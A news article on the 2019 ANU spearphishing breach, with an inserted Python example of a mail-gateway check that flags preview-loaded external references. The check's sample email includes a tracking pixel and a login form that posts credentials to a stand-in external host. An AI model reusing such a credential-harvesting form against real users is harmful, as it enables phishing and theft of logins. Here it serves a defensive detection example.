Published on 10/10/2019 | Written by Heather Wright
Interaction not required in ANU spearphishing attack…
A ‘sophisticated spearphishing email’ which didn’t require any user interaction gave an unidentified attacker access to Australian National University (ANU) systems, but a detailed investigation into the attack has failed to identify which records were stolen, who was behind the breach or the possible reasons for it.
In what it says is an effort to be as transparent as possible, the ANU has released a 20-page report into the attack, which breached the University’s Enterprise Systems Domain administrative systems housing HR, financial management, student administration and enterprise e-form systems.
While the attacker gained access to the system in early November 2018 and was active in the network for around six weeks, the intrusion wasn’t detected until April 2019, when a threat hunting exercise uncovered suspicious network traffic data.
An incident response team uncovered the data breach on 17 May.
Brian Schmidt, Australian National University vice-chancellor and president, says the perpetrators of the breach were ‘extremely sophisticated’, shocking ‘even the most experienced Australian security experts’.
Following the ANU’s announcement of the attack in June, fingers were pointed at China. However, the report says it was unable to identify who was behind the latest attack – believed to have been a different attacker to that behind the May 2018 attack.
The report, which deliberately glosses over some details to ensure it isn’t ‘an instruction manual for would-be hackers’, outlines how a spearphishing email was used to gain access. The email, however, didn’t require user interaction such as clicking on a link or downloading an attachment. Despite only being previewed by the senior staff member who received it, the interaction-less attack resulted in the staff member’s credentials being sent to several external web addresses.
Despite only being previewed, the interaction-less attack email garnered credentials.
“It is highly likely that the credentials taken from this account were used to gain access to other systems,” the report says. Access was also gained to the staff member’s calendar, with information from that used to conduct additional spearphishing attacks.
From there the attacker used the stolen credentials to gain access to an internet-facing webserver, before compromising a legacy server hosting trial software that was attached to a virtual LAN with extensive access across the ANU network.
“In addition to their efficiency and precision, the actor evaded detection systems, evolved their techniques during the campaign, used custom malware and demonstrated an exceptional degree of operational security that left few traces of their activities,” ANU says.
“The actor exhibited exceptional operational security during the campaign and left very little in the way of forensic evidence. Logs, disk and file wipes were a recurrent feature of the campaign.”
The attack included several phishing campaigns, and the report notes the need for greater phishing awareness as one of the key lessons learned – along with the need for protection of affected members and dealing with any repercussions due to the loss of personally identifiable information.
“Given the methods of the actor and the number of successfully phished users, it is clear to us that more effort is required to help drive awareness and safe user behaviours,” ANU says, noting that it has begun phishing awareness campaigns and invested in stronger mail gateway safeguards.
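The report describes an email that leaked credentials to several external web addresses when it was merely previewed, and ANU's response includes stronger mail gateway safeguards. The following is an added example, not code from ANU or from the report, of one check a gateway can run for that class of message: parse the HTML part, collect every reference a mail client may fetch or submit without a click (images, stylesheets, frames, scripts, form actions), and hold or flag the message when those references point outside an allow-list of internal hosts. The allow-list (`INTERNAL_SUFFIXES`), the sample message and the quarantine policy are all assumptions constructed for the example.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (not taken from the ANU report). It is an HTML-only
# email whose body references an external tracking image, an internal stylesheet,
# and a login form that posts to an external host.
SAMPLE_EML = """From: sender@example.org
To: staff@example-university.invalid
Subject: Updated timesheet
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Please review the attached timesheet.</p>
<img src="https://tracker.example.net/open?u=staff" width="1" height="1">
<link rel="stylesheet" href="https://cdn.example-university.invalid/style.css">
<form action="https://collect.example.net/login" method="post">
<input name="user"><input name="pass" type="password"></form>
</body></html>
"""

# Hypothetical allow-list: hosts the organisation treats as internal.
INTERNAL_SUFFIXES = ("example-university.invalid",)

# Tag/attribute pairs that a mail client may load or submit without a user click.
AUTO_LOAD_ATTRS = {
    "img": "src", "link": "href", "iframe": "src", "script": "src",
    "object": "data", "embed": "src", "form": "action",
}


def is_internal(host: str) -> bool:
    """Exact or sub-domain match against the allow-list (no bare endswith, so
    'evil-example-university.invalid' does not pass)."""
    return any(host == s or host.endswith("." + s) for s in INTERNAL_SUFFIXES)


class _RefCollector(HTMLParser):
    """Collects (tag, url) pairs for the auto-loading attributes above."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = AUTO_LOAD_ATTRS.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.refs.append((tag, value))


def external_references(raw_message: str):
    """Return (tag, url, host) triples for auto-loading references to hosts that
    are not on the internal allow-list. References without a hostname (cid:,
    data:, relative paths) are ignored because they cannot reach the network."""
    msg = email.message_from_string(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        collector = _RefCollector()
        collector.feed(part.get_content())
        for tag, url in collector.refs:
            host = urlparse(url).hostname or ""
            if host and not is_internal(host):
                findings.append((tag, url, host))
    return findings


def classify(raw_message: str) -> str:
    """Assumed gateway policy: hold messages with a form posting externally,
    flag messages that only load external resources, deliver everything else."""
    tags = {tag for tag, _, _ in external_references(raw_message)}
    if "form" in tags:
        return "quarantine"
    if tags:
        return "flag"
    return "deliver"


if __name__ == "__main__":
    for tag, url, host in external_references(SAMPLE_EML):
        print(f"{tag:6} -> {host:28} {url}")
    print("decision:", classify(SAMPLE_EML))
```

The check deliberately ignores whether the recipient clicks anything: it models what the client does on preview, which is the behaviour the report singles out. Auto-loading references to internal hosts are left alone so that ordinary branded mail is not flagged, while a form that would carry typed credentials off-network is the strongest signal and is held outright.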
Todd Peterson, IAM evangelist at One Identity, is a little more scathing.
“In 2018, it took just 16 minutes for the first click to occur on a phishing email,” he says. “As such it is worrying that in 2019, that timeframe has not lengthened at all.
“Whilst advanced privileged access management systems and two-factor authentication may be used correctly by organisations, newly developed infected emails can still pass the defence line and enter a network. With this in mind, it is important that identity and access management systems and processes are current; with the fast-moving nature of these hacks, it is vital organisations keep up.”
Peterson says that’s particularly true for higher education institutions, which are at higher risk as a result of maintaining old computers and systems that house significant amounts of valuable personal data which can be sold on the black market.
ANU says it’s continuing to scan online sources for evidence any of the stolen data is being traded or used illegally. As yet there’s been no evidence of any activity.
The University, which acknowledges in the report that several technical vulnerabilities and people and process issues contributed to the success of the attack, has since bolstered its cyber security.